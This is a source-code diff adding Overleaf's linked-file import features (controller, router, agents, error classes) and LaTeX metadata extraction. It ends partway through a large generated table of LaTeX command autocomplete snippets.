LinkedFilesController.handleError(err, req, res, next) + } +} + +async function refreshLinkedFile(req, res, next) { + const { project_id: projectId, file_id: fileId } = req.params + const userId = SessionManager.getLoggedInUserId(req.session) + + const { file, parentFolder } = await LinkedFilesHandler.promises.getFileById( + 
projectId, + fileId + ) + + if (file == null) { + return res.sendStatus(404) + } + const { name } = file + const { linkedFileData } = file + if ( + linkedFileData == null || + (linkedFileData != null ? linkedFileData.provider : undefined) == null + ) { + return res.sendStatus(409) + } + + const { provider } = linkedFileData + const parentFolderId = parentFolder._id + const Agent = await LinkedFilesController._getAgent(provider) + if (Agent == null) { + return res.sendStatus(400) + } + + linkedFileData.importedAt = new Date().toISOString() + let newFileId + try { + newFileId = await Agent.promises.refreshLinkedFile( + projectId, + linkedFileData, + name, + parentFolderId, + userId + ) + } catch (err) { + return LinkedFilesController.handleError(err, req, res, next) + } + + if (req.body.shouldReindexReferences) { + let data + try { + data = await ReferencesHandler.promises.indexAll(projectId) + } catch (error) { + OError.tag(error, 'failed to index references', { + projectId, + }) + return next(error) + } + EditorRealTimeController.emitToRoom( + projectId, + 'references:keys:updated', + data.keys, + true + ) + res.json({ new_file_id: newFileId }) + } else { + res.json({ new_file_id: newFileId }) + } +} + +export default LinkedFilesController = { + Agents: null, + + async _cacheAgents() { + if (!LinkedFilesController.Agents) { + LinkedFilesController.Agents = _.extend( + { + url: UrlAgent, + project_file: ProjectFileAgent, + project_output_file: ProjectOutputFileAgent, + }, + await Modules.linkedFileAgentsIncludes() + ) + } + }, + + async _getAgent(provider) { + await LinkedFilesController._cacheAgents() + if ( + !Object.prototype.hasOwnProperty.call( + LinkedFilesController.Agents, + provider + ) + ) { + return null + } + if (!Array.from(Settings.enabledLinkedFileTypes).includes(provider)) { + return null + } + return LinkedFilesController.Agents[provider] + }, + + createLinkedFile: expressify(createLinkedFile), + + refreshLinkedFile: expressify(refreshLinkedFile), + + handleError(error, req, res, next) { + if (error instanceof AccessDeniedError) { + res.status(403) + plainTextResponse( + res, + res.locals.translate( + 'the_project_that_contains_this_file_is_not_shared_with_you' + ) + ) + } else if (error instanceof BadDataError) { + res.status(400) + plainTextResponse(res, 'The submitted data is not valid') + } else if (error instanceof BadEntityTypeError) { + res.status(400) + plainTextResponse(res, 'The file is the wrong type') + } else if (error instanceof SourceFileNotFoundError) { + res.status(404) + plainTextResponse(res, 'Source file not found') + } else if (error instanceof ProjectNotFoundError) { + res.status(404) + plainTextResponse(res, 'Project not found') + } else if (error instanceof V1ProjectNotFoundError) { + res.status(409) + plainTextResponse( + res, + 'Sorry, the source project is not yet imported to Overleaf v2. Please import it to Overleaf v2 to refresh this file' + ) + } else if (error instanceof CompileFailedError) { + res.status(422) + plainTextResponse( + res, + res.locals.translate('generic_linked_file_compile_error') + ) + } else if (error instanceof OutputFileFetchFailedError) { + res.status(404) + plainTextResponse(res, 'Could not get output file') + } else if (error instanceof UrlFetchFailedError) { + res.status(422) + if (error.cause instanceof FileTooLargeError) { + plainTextResponse(res, 'File too large') + } else { + plainTextResponse( + res, + `Your URL could not be reached (${ + error.info?.status || error.cause?.info?.status + } status code). 
Please check it and try again.` + ) + } + } else if (error instanceof InvalidUrlError) { + res.status(422) + plainTextResponse( + res, + 'Your URL is not valid. Please check it and try again.' + ) + } else if (error instanceof NotOriginalImporterError) { + res.status(400) + plainTextResponse( + res, + 'You are not the user who originally imported this file' + ) + } else if (error instanceof FeatureNotAvailableError) { + res.status(400) + plainTextResponse(res, 'This feature is not enabled on your account') + } else if (error instanceof RemoteServiceError) { + if (error.info?.statusCode === 403) { + res.status(400).json({ relink: true }) + } else { + res.status(502) + plainTextResponse(res, 'The remote service produced an error') + } + } else if (error instanceof FileCannotRefreshError) { + res.status(400) + plainTextResponse(res, 'This file cannot be refreshed') + } else if (error.message === 'project_has_too_many_files') { + res.status(400) + plainTextResponse(res, 'too many files') + } else if (/\bECONNREFUSED\b/.test(error.message)) { + res.status(500) + plainTextResponse(res, 'Importing references is not currently available') + } else if (error instanceof FileTooLargeError) { + res.status(422) + plainTextResponse(res, 'File too large') + } else { + next(error) + } + }, +} diff --git a/services/web/app/src/Features/LinkedFiles/LinkedFilesErrors.js b/services/web/app/src/Features/LinkedFiles/LinkedFilesErrors.js new file mode 100644 index 0000000..f74152f --- /dev/null +++ b/services/web/app/src/Features/LinkedFiles/LinkedFilesErrors.js @@ -0,0 +1,43 @@ +const { BackwardCompatibleError } = require('../Errors/Errors') + +class UrlFetchFailedError extends BackwardCompatibleError {} + +class InvalidUrlError extends BackwardCompatibleError {} + +class CompileFailedError extends BackwardCompatibleError {} + +class AccessDeniedError extends BackwardCompatibleError {} + +class BadEntityTypeError extends BackwardCompatibleError {} + +class BadDataError extends BackwardCompatibleError {} + +class ProjectNotFoundError extends BackwardCompatibleError {} + +class V1ProjectNotFoundError extends BackwardCompatibleError {} + +class SourceFileNotFoundError extends BackwardCompatibleError {} + +class NotOriginalImporterError extends BackwardCompatibleError {} + +class FeatureNotAvailableError extends BackwardCompatibleError {} + +class RemoteServiceError extends BackwardCompatibleError {} + +class FileCannotRefreshError extends BackwardCompatibleError {} + +module.exports = { + CompileFailedError, + UrlFetchFailedError, + InvalidUrlError, + AccessDeniedError, + BadEntityTypeError, + BadDataError, + ProjectNotFoundError, + V1ProjectNotFoundError, + SourceFileNotFoundError, + NotOriginalImporterError, + FeatureNotAvailableError, + RemoteServiceError, + FileCannotRefreshError, +} diff --git a/services/web/app/src/Features/LinkedFiles/LinkedFilesHandler.js b/services/web/app/src/Features/LinkedFiles/LinkedFilesHandler.js new file mode 100644 index 0000000..a12f27f --- /dev/null +++ b/services/web/app/src/Features/LinkedFiles/LinkedFilesHandler.js @@ -0,0 +1,108 @@ +const FileWriter = require('../../infrastructure/FileWriter') +const EditorController = require('../Editor/EditorController') +const ProjectLocator = require('../Project/ProjectLocator') +const { Project } = require('../../models/Project') +const ProjectGetter = require('../Project/ProjectGetter') +const { + ProjectNotFoundError, + V1ProjectNotFoundError, + BadDataError, +} = require('./LinkedFilesErrors') +const { callbackifyAll } = 
require('@overleaf/promise-utils') + +const LinkedFilesHandler = { + async getFileById(projectId, fileId) { + const { element, path, folder } = await ProjectLocator.promises.findElement( + { + project_id: projectId, + element_id: fileId, + type: 'file', + } + ) + return { file: element, path, parentFolder: folder } + }, + + async getSourceProject(data) { + const projection = { _id: 1, name: 1, overleaf: 1 } // include the historyId for future use + if (data.v1_source_doc_id != null) { + const project = await Project.findOne( + { 'overleaf.id': data.v1_source_doc_id }, + projection + ).exec() + + if (project == null) { + throw new V1ProjectNotFoundError() + } + + return project + } else if (data.source_project_id != null) { + const project = await ProjectGetter.promises.getProject( + data.source_project_id, + projection + ) + + if (project == null) { + throw new ProjectNotFoundError() + } + + return project + } else { + throw new BadDataError('neither v1 nor v2 id present') + } + }, + + async importFromStream( + projectId, + readStream, + linkedFileData, + name, + parentFolderId, + userId + ) { + const fsPath = await FileWriter.promises.writeStreamToDisk( + projectId, + readStream + ) + + return await EditorController.promises.upsertFile( + projectId, + parentFolderId, + name, + fsPath, + linkedFileData, + 'upload', + userId + ) + }, + + async importContent( + projectId, + content, + linkedFileData, + name, + parentFolderId, + userId + ) { + const fsPath = await FileWriter.promises.writeContentToDisk( + projectId, + content + ) + + return await EditorController.promises.upsertFile( + projectId, + parentFolderId, + name, + fsPath, + linkedFileData, + 'upload', + userId + ) + }, +} + +module.exports = { + promises: LinkedFilesHandler, + ...callbackifyAll(LinkedFilesHandler, { + multiResult: { getFileById: ['file', 'path', 'parentFolder'] }, + }), +} diff --git a/services/web/app/src/Features/LinkedFiles/LinkedFilesRouter.mjs b/services/web/app/src/Features/LinkedFiles/LinkedFilesRouter.mjs new file mode 100644 index 0000000..53b49d0 --- /dev/null +++ b/services/web/app/src/Features/LinkedFiles/LinkedFilesRouter.mjs @@ -0,0 +1,47 @@ +import AuthorizationMiddleware from '../Authorization/AuthorizationMiddleware.js' +import AuthenticationController from '../Authentication/AuthenticationController.js' +import { RateLimiter } from '../../infrastructure/RateLimiter.js' +import RateLimiterMiddleware from '../Security/RateLimiterMiddleware.js' +import LinkedFilesController from './LinkedFilesController.mjs' +import { validate, Joi } from '../../infrastructure/Validation.js' + +const rateLimiters = { + createLinkedFile: new RateLimiter('create-linked-file', { + points: 100, + duration: 60, + }), + refreshLinkedFile: new RateLimiter('refresh-linked-file', { + points: 100, + duration: 60, + }), +} + +export default { + apply(webRouter) { + webRouter.post( + '/project/:project_id/linked_file', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + RateLimiterMiddleware.rateLimit(rateLimiters.createLinkedFile, { + params: ['project_id'], + }), + validate({ + body: { + name: Joi.string().required(), + // TODO: validate the remaining properties + }, + }), + LinkedFilesController.createLinkedFile + ) + + webRouter.post( + '/project/:project_id/linked_file/:file_id/refresh', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + RateLimiterMiddleware.rateLimit(rateLimiters.refreshLinkedFile, { + params: 
['project_id'], + }), + LinkedFilesController.refreshLinkedFile + ) + }, +} diff --git a/services/web/app/src/Features/LinkedFiles/ProjectFileAgent.js b/services/web/app/src/Features/LinkedFiles/ProjectFileAgent.js new file mode 100644 index 0000000..03227d1 --- /dev/null +++ b/services/web/app/src/Features/LinkedFiles/ProjectFileAgent.js @@ -0,0 +1,266 @@ +/* eslint-disable + n/handle-callback-err, + max-len, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let ProjectFileAgent +const AuthorizationManager = require('../Authorization/AuthorizationManager') +const ProjectLocator = require('../Project/ProjectLocator') +const DocstoreManager = require('../Docstore/DocstoreManager') +const DocumentUpdaterHandler = require('../DocumentUpdater/DocumentUpdaterHandler') +const FileStoreHandler = require('../FileStore/FileStoreHandler') +const _ = require('lodash') +const LinkedFilesHandler = require('./LinkedFilesHandler') +const { + BadDataError, + AccessDeniedError, + BadEntityTypeError, + SourceFileNotFoundError, +} = require('./LinkedFilesErrors') +const { promisify } = require('@overleaf/promise-utils') + +module.exports = ProjectFileAgent = { + createLinkedFile( + projectId, + linkedFileData, + name, + parentFolderId, + userId, + callback + ) { + if (!ProjectFileAgent._canCreate(linkedFileData)) { + return callback(new AccessDeniedError()) + } + return ProjectFileAgent._go( + projectId, + linkedFileData, + name, + parentFolderId, + userId, + callback + ) + }, + + refreshLinkedFile( + projectId, + linkedFileData, + name, + parentFolderId, + userId, + callback + ) { + return ProjectFileAgent._go( + projectId, + linkedFileData, + name, + parentFolderId, + userId, + callback + ) + }, + + _prepare(projectId, linkedFileData, userId, callback) { + if (callback == null) { + callback = function () {} + } + return ProjectFileAgent._checkAuth( + projectId, + linkedFileData, + userId, + (err, allowed) => { + if (err != null) { + return callback(err) + } + if (!allowed) { + return callback(new AccessDeniedError()) + } + if (!ProjectFileAgent._validate(linkedFileData)) { + return callback(new BadDataError()) + } + return callback(null, linkedFileData) + } + ) + }, + + _go(projectId, linkedFileData, name, parentFolderId, userId, callback) { + linkedFileData = ProjectFileAgent._sanitizeData(linkedFileData) + return ProjectFileAgent._prepare( + projectId, + linkedFileData, + userId, + (err, linkedFileData) => { + if (err != null) { + return callback(err) + } + if (!ProjectFileAgent._validate(linkedFileData)) { + return callback(new BadDataError()) + } + return ProjectFileAgent._getEntity( + linkedFileData, + userId, + (err, sourceProject, entity, type) => { + if (err != null) { + return callback(err) + } + if (type === 'doc') { + return DocstoreManager.getDoc( + sourceProject._id, + entity._id, + function (err, lines) { + if (err != null) { + return callback(err) + } + return LinkedFilesHandler.importContent( + projectId, + lines.join('\n'), + linkedFileData, + name, + parentFolderId, + userId, + function (err, file) { + if (err != null) { + return callback(err) + } + return callback(null, file._id) + } + ) + } + ) // Created + } else if (type === 'file') { + return FileStoreHandler.getFileStreamNew( + 
sourceProject, + entity, + null, + function (err, fileStream) { + if (err != null) { + return callback(err) + } + return LinkedFilesHandler.importFromStream( + projectId, + fileStream, + linkedFileData, + name, + parentFolderId, + userId, + function (err, file) { + if (err != null) { + return callback(err) + } + return callback(null, file._id) + } + ) + } + ) // Created + } else { + return callback(new BadEntityTypeError()) + } + } + ) + } + ) + }, + + _getEntity(linkedFileData, currentUserId, callback) { + if (callback == null) { + callback = function () {} + } + callback = _.once(callback) + const { source_entity_path: sourceEntityPath } = linkedFileData + return ProjectFileAgent._getSourceProject( + linkedFileData, + function (err, project) { + if (err != null) { + return callback(err) + } + const sourceProjectId = project._id + return DocumentUpdaterHandler.flushProjectToMongo( + sourceProjectId, + function (err) { + if (err != null) { + return callback(err) + } + return ProjectLocator.findElementByPath( + { + project_id: sourceProjectId, + path: sourceEntityPath, + exactCaseMatch: true, + }, + function (err, entity, type) { + if (err != null) { + if (/^not found.*/.test(err.message)) { + err = new SourceFileNotFoundError() + } + return callback(err) + } + return callback(null, project, entity, type) + } + ) + } + ) + } + ) + }, + + _sanitizeData(data) { + return _.pick( + data, + 'provider', + 'source_project_id', + 'v1_source_doc_id', + 'source_entity_path', + 'importedAt' + ) + }, + + _validate(data) { + return ( + (data.source_project_id != null || data.v1_source_doc_id != null) && + data.source_entity_path != null + ) + }, + + _canCreate(data) { + // Don't allow creation of linked-files with v1 doc ids + return data.v1_source_doc_id == null + }, + + _getSourceProject: LinkedFilesHandler.getSourceProject, + + _checkAuth(projectId, data, currentUserId, callback) { + if (callback == null) { + callback = function () {} + } + callback = _.once(callback) + if (!ProjectFileAgent._validate(data)) { + return callback(new BadDataError()) + } + return ProjectFileAgent._getSourceProject(data, function (err, project) { + if (err != null) { + return callback(err) + } + return AuthorizationManager.canUserReadProject( + currentUserId, + project._id, + null, + function (err, canRead) { + if (err != null) { + return callback(err) + } + return callback(null, canRead) + } + ) + }) + }, +} + +ProjectFileAgent.promises = { + createLinkedFile: promisify(ProjectFileAgent.createLinkedFile), + refreshLinkedFile: promisify(ProjectFileAgent.refreshLinkedFile), +} diff --git a/services/web/app/src/Features/LinkedFiles/ProjectOutputFileAgent.mjs b/services/web/app/src/Features/LinkedFiles/ProjectOutputFileAgent.mjs new file mode 100644 index 0000000..0af62b2 --- /dev/null +++ b/services/web/app/src/Features/LinkedFiles/ProjectOutputFileAgent.mjs @@ -0,0 +1,236 @@ +import AuthorizationManager from '../Authorization/AuthorizationManager.js' +import CompileManager from '../Compile/CompileManager.js' +import ClsiManager from '../Compile/ClsiManager.js' +import ProjectFileAgent from './ProjectFileAgent.js' +import _ from 'lodash' +import { + CompileFailedError, + BadDataError, + AccessDeniedError, +} from './LinkedFilesErrors.js' +import { OutputFileFetchFailedError } from '../Errors/Errors.js' +import LinkedFilesHandler from './LinkedFilesHandler.js' +import { promisify } from '@overleaf/promise-utils' + +function _prepare(projectId, linkedFileData, userId, callback) { + _checkAuth(projectId, linkedFileData, 
userId, (err, allowed) => { + if (err) { + return callback(err) + } + if (!allowed) { + return callback(new AccessDeniedError()) + } + if (!_validate(linkedFileData)) { + return callback(new BadDataError()) + } + callback(null, linkedFileData) + }) +} + +function createLinkedFile( + projectId, + linkedFileData, + name, + parentFolderId, + userId, + callback +) { + if (!ProjectFileAgent._canCreate(linkedFileData)) { + return callback(new AccessDeniedError()) + } + linkedFileData = _sanitizeData(linkedFileData) + _prepare(projectId, linkedFileData, userId, (err, linkedFileData) => { + if (err) { + return callback(err) + } + _getFileStream(linkedFileData, userId, (err, readStream) => { + if (err) { + return callback(err) + } + LinkedFilesHandler.importFromStream( + projectId, + readStream, + linkedFileData, + name, + parentFolderId, + userId, + (err, file) => { + if (err) { + return callback(err) + } + callback(null, file._id) + } + ) + }) + }) +} + +function refreshLinkedFile( + projectId, + linkedFileData, + name, + parentFolderId, + userId, + callback +) { + _prepare(projectId, linkedFileData, userId, (err, linkedFileData) => { + if (err) { + return callback(err) + } + _compileAndGetFileStream( + linkedFileData, + userId, + (err, readStream, newBuildId) => { + if (err) { + return callback(err) + } + linkedFileData.build_id = newBuildId + LinkedFilesHandler.importFromStream( + projectId, + readStream, + linkedFileData, + name, + parentFolderId, + userId, + (err, file) => { + if (err) { + return callback(err) + } + callback(null, file._id) + } + ) + } + ) + }) +} + +function _sanitizeData(data) { + return { + provider: data.provider, + source_project_id: data.source_project_id, + source_output_file_path: data.source_output_file_path, + build_id: data.build_id, + clsiServerId: data.clsiServerId, + importedAt: data.importedAt, + } +} + +function _validate(data) { + return ( + (data.v1_source_doc_id != null && data.source_output_file_path != null) || + (data.source_project_id != null && + data.source_output_file_path != null && + data.build_id != null) + ) +} + +function _checkAuth(projectId, data, currentUserId, callback) { + callback = _.once(callback) + if (!_validate(data)) { + return callback(new BadDataError()) + } + LinkedFilesHandler.getSourceProject(data, (err, project) => { + if (err) { + return callback(err) + } + AuthorizationManager.canUserReadProject( + currentUserId, + project._id, + null, + (err, canRead) => { + if (err) { + return callback(err) + } + callback(null, canRead) + } + ) + }) +} + +function _getFileStream(linkedFileData, userId, callback) { + callback = _.once(callback) + const { + source_output_file_path: sourceOutputFilePath, + build_id: buildId, + clsiServerId, + } = linkedFileData + LinkedFilesHandler.getSourceProject(linkedFileData, (err, project) => { + if (err) { + return callback(err) + } + const sourceProjectId = project._id + CompileManager.getProjectCompileLimits(sourceProjectId, (err, limits) => { + if (err) return callback(err) + + ClsiManager.getOutputFileStream( + sourceProjectId, + userId, + limits, + clsiServerId, + buildId, + sourceOutputFilePath, + (err, readStream) => { + if (err) { + return callback(err) + } + callback(null, readStream) + } + ) + }) + }) +} + +function _compileAndGetFileStream(linkedFileData, userId, callback) { + callback = _.once(callback) + const { source_output_file_path: sourceOutputFilePath } = linkedFileData + LinkedFilesHandler.getSourceProject(linkedFileData, (err, project) => { + if (err) { + return callback(err) + } + 
const sourceProjectId = project._id + CompileManager.compile( + sourceProjectId, + userId, + {}, + (err, status, outputFiles, clsiServerId, limits) => { + if (err) { + return callback(err) + } + if (status !== 'success') { + return callback(new CompileFailedError()) + } + const outputFile = _.find( + outputFiles, + o => o.path === sourceOutputFilePath + ) + if (outputFile == null) { + return callback(new OutputFileFetchFailedError()) + } + const buildId = outputFile.build + ClsiManager.getOutputFileStream( + sourceProjectId, + userId, + limits, + clsiServerId, + buildId, + sourceOutputFilePath, + (err, readStream) => { + if (err) { + return callback(err) + } + callback(null, readStream, buildId) + } + ) + } + ) + }) +} + +export default { + createLinkedFile, + refreshLinkedFile, + promises: { + createLinkedFile: promisify(createLinkedFile), + refreshLinkedFile: promisify(refreshLinkedFile), + }, +} diff --git a/services/web/app/src/Features/LinkedFiles/UrlAgent.mjs b/services/web/app/src/Features/LinkedFiles/UrlAgent.mjs new file mode 100644 index 0000000..12785d7 --- /dev/null +++ b/services/web/app/src/Features/LinkedFiles/UrlAgent.mjs @@ -0,0 +1,83 @@ +import logger from '@overleaf/logger' +import urlValidator from 'valid-url' +import { InvalidUrlError, UrlFetchFailedError } from './LinkedFilesErrors.js' +import LinkedFilesHandler from './LinkedFilesHandler.js' +import UrlHelper from '../Helpers/UrlHelper.js' +import { fetchStream, RequestFailedError } from '@overleaf/fetch-utils' +import { callbackify } from '@overleaf/promise-utils' +import { FileTooLargeError } from '../Errors/Errors.js' + +async function createLinkedFile( + projectId, + linkedFileData, + name, + parentFolderId, + userId +) { + logger.info( + { projectId, userId, url: linkedFileData.url }, + 'create linked file' + ) + linkedFileData = _sanitizeData(linkedFileData) + const fetchUrl = _getUrl(projectId, linkedFileData, userId) + try { + const readStream = await fetchStream(fetchUrl) + const file = await LinkedFilesHandler.promises.importFromStream( + projectId, + readStream, + linkedFileData, + name, + parentFolderId, + userId + ) + return file._id + } catch (error) { + if (error instanceof RequestFailedError && /too large/.test(error.body)) { + throw new FileTooLargeError('file too large', { + url: linkedFileData.url, + }).withCause(error) + } + throw new UrlFetchFailedError('url fetch failed', { + url: linkedFileData.url, + }).withCause(error) + } +} + +async function refreshLinkedFile( + projectId, + linkedFileData, + name, + parentFolderId, + userId +) { + return await createLinkedFile( + projectId, + linkedFileData, + name, + parentFolderId, + userId + ) +} + +function _sanitizeData(data) { + return { + provider: data.provider, + url: UrlHelper.prependHttpIfNeeded(data.url), + importedAt: data.importedAt, + } +} + +function _getUrl(projectId, data, currentUserId) { + let { url } = data + if (!urlValidator.isWebUri(url)) { + throw new InvalidUrlError(`invalid url: ${url}`) + } + url = UrlHelper.wrapUrlWithProxy(url) + return url +} + +export default { + createLinkedFile: callbackify(createLinkedFile), + refreshLinkedFile: callbackify(refreshLinkedFile), + promises: { createLinkedFile, refreshLinkedFile }, +} diff --git a/services/web/app/src/Features/Metadata/MetaController.mjs b/services/web/app/src/Features/Metadata/MetaController.mjs new file mode 100644 index 0000000..417217e --- /dev/null +++ b/services/web/app/src/Features/Metadata/MetaController.mjs @@ -0,0 +1,61 @@ +import OError from '@overleaf/o-error' 
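+// Orientation sketch for the handlers below (route wiring is defined
+// elsewhere and is not part of this file): getMetadata responds with
+//   { projectId, projectMeta }
+// where projectMeta maps each doc id to { labels, packages, packageNames },
+// and broadcastMetadataForDoc emits a 'broadcastDocMeta' event to the
+// project room with { docId, meta }, unless the request body sets
+// broadcast to false, in which case the metadata is returned as JSON.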
+import EditorRealTimeController from '../Editor/EditorRealTimeController.js' +import MetaHandler from './MetaHandler.mjs' +import logger from '@overleaf/logger' +import { expressify } from '@overleaf/promise-utils' + +async function getMetadata(req, res) { + const { project_id: projectId } = req.params + + logger.debug({ projectId }, 'getting all labels for project') + + let projectMeta + try { + projectMeta = await MetaHandler.promises.getAllMetaForProject(projectId) + } catch (error) { + throw OError.tag( + error, + '[MetaController] error getting all labels from project', + { + project_id: projectId, + } + ) + } + + res.json({ projectId, projectMeta }) +} + +async function broadcastMetadataForDoc(req, res) { + const { project_id: projectId } = req.params + const { doc_id: docId } = req.params + const { broadcast } = req.body + + logger.debug({ projectId, docId, broadcast }, 'getting labels for doc') + + let docMeta + try { + docMeta = await MetaHandler.promises.getMetaForDoc(projectId, docId) + } catch (error) { + throw OError.tag(error, '[MetaController] error getting labels from doc', { + project_id: projectId, + doc_id: docId, + }) + } + + // default to broadcasting, unless explicitly disabled (for backwards compatibility) + if (broadcast === false) { + return res.json({ docId, meta: docMeta }) + } + + EditorRealTimeController.emitToRoom(projectId, 'broadcastDocMeta', { + docId, + meta: docMeta, + }) + + res.sendStatus(200) // 204? +} + +export default { + getMetadata: expressify(getMetadata), + broadcastMetadataForDoc: expressify(broadcastMetadataForDoc), +} diff --git a/services/web/app/src/Features/Metadata/MetaHandler.mjs b/services/web/app/src/Features/Metadata/MetaHandler.mjs new file mode 100644 index 0000000..ef5d118 --- /dev/null +++ b/services/web/app/src/Features/Metadata/MetaHandler.mjs @@ -0,0 +1,132 @@ +import ProjectEntityHandler from '../Project/ProjectEntityHandler.js' +import DocumentUpdaterHandler from '../DocumentUpdater/DocumentUpdaterHandler.js' +import packageMapping from './packageMapping.mjs' +import { callbackify } from '@overleaf/promise-utils' + +/** @typedef {{ + * labels: string[] + * packages: Record<string, Record<string, any>>, + * packageNames: string[], + * }} DocMeta + */ + +/** + * @param {string[]} lines + * @return {Promise<DocMeta>} + */ +async function extractMetaFromDoc(lines) { + /** @type {DocMeta} */ + const docMeta = { + labels: [], + packages: {}, + packageNames: [], + } + + const labelRe = /\\label{(.{0,80}?)}/g + const labelOptionRe = /\blabel={?(.{0,80}?)[\s},\]]/g + const packageRe = /^\\usepackage(?:\[.{0,80}?])?{(.{0,80}?)}/g + const reqPackageRe = /^\\RequirePackage(?:\[.{0,80}?])?{(.{0,80}?)}/g + + for (const rawLine of lines) { + const line = getNonCommentedContent(rawLine) + + for (const label of lineMatches(labelRe, line)) { + docMeta.labels.push(label) + } + + for (const label of lineMatches(labelOptionRe, line)) { + docMeta.labels.push(label) + } + + for (const pkg of lineMatches(packageRe, line, ',')) { + docMeta.packageNames.push(pkg) + } + + for (const pkg of lineMatches(reqPackageRe, line, ',')) { + docMeta.packageNames.push(pkg) + } + } + + for (const packageName of docMeta.packageNames) { + if (packageMapping[packageName]) { + docMeta.packages[packageName] = packageMapping[packageName] + } + } + + return docMeta +} + +/** + * + * @param {RegExp} matchRe + * @param {string} line + * @param {string} [separator] + * @return {Generator<string>} + */ +function* lineMatches(matchRe, line, separator) { + let match + while 
((match = matchRe.exec(line))) { + const matched = match[1].trim() + + if (matched) { + if (separator) { + const items = matched + .split(',') + .map(item => item.trim()) + .filter(Boolean) + + for (const item of items) { + yield item + } + } else { + yield matched + } + } + } +} + +/** + * @param {Record<string, { _id: string, lines: string[] }>} projectDocs + * @return {Promise<Record<string, DocMeta>>} + */ +async function extractMetaFromProjectDocs(projectDocs) { + const projectMeta = {} + for (const doc of Object.values(projectDocs)) { + projectMeta[doc._id] = await extractMetaFromDoc(doc.lines) + } + return projectMeta +} + +/** + * Trims comment content from a line, e.g. 'foo % bar' -> 'foo ' (an escaped \% is left alone) + * @param {string} rawLine + * @returns {string} + */ +function getNonCommentedContent(rawLine) { + return rawLine.replace(/(^|[^\\])%.*/, '$1') +} + +async function getAllMetaForProject(projectId) { + await DocumentUpdaterHandler.promises.flushProjectToMongo(projectId) + + const docs = await ProjectEntityHandler.promises.getAllDocs(projectId) + + return await extractMetaFromProjectDocs(docs) +} + +async function getMetaForDoc(projectId, docId) { + await DocumentUpdaterHandler.promises.flushDocToMongo(projectId, docId) + + const { lines } = await ProjectEntityHandler.promises.getDoc(projectId, docId) + + return await extractMetaFromDoc(lines) +} + +export default { + promises: { + getAllMetaForProject, + getMetaForDoc, + }, + getAllMetaForProject: callbackify(getAllMetaForProject), + getMetaForDoc: callbackify(getMetaForDoc), +} diff --git a/services/web/app/src/Features/Metadata/packageMapping.mjs b/services/web/app/src/Features/Metadata/packageMapping.mjs new file mode 100644 index 0000000..2af10a0 --- /dev/null +++ b/services/web/app/src/Features/Metadata/packageMapping.mjs @@ -0,0 +1,71596 @@ +export default { + inputenc: [ + { + caption: '\\inputencoding{}', + snippet: '\\inputencoding{$1}', + meta: 'inputenc-cmd', + score: 0.0002447047447770061, + }, + ], + graphicx: [ + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'graphicx-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'graphicx-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'graphicx-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'graphicx-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'graphicx-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'graphicx-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'graphicx-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'graphicx-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'graphicx-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'graphicx-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'graphicx-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'graphicx-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'graphicx-cmd', +
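+ // Schema note (inferred from the surrounding entries, not part of the generated data): every entry pairs a caption (text shown in the autocomplete list) with a snippet (the tab-stop template inserted on selection); meta tags the owning package, and score appears to be a relative usage weight used to rank suggestions. + // A hypothetical minimal entry, with a made-up package 'mypkg' for illustration only: + // { caption: '\\foo{}', snippet: '\\foo{$1}', meta: 'mypkg-cmd', score: 0.01 },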
score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'graphicx-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'graphicx-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'graphicx-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'graphicx-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'graphicx-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'graphicx-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'graphicx-cmd', + score: 0.008565354665444157, + }, + ], + amsmath: [ + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'amsmath-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'amsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'amsmath-cmd', + score: 0.006963729684667191, + }, + { + caption: 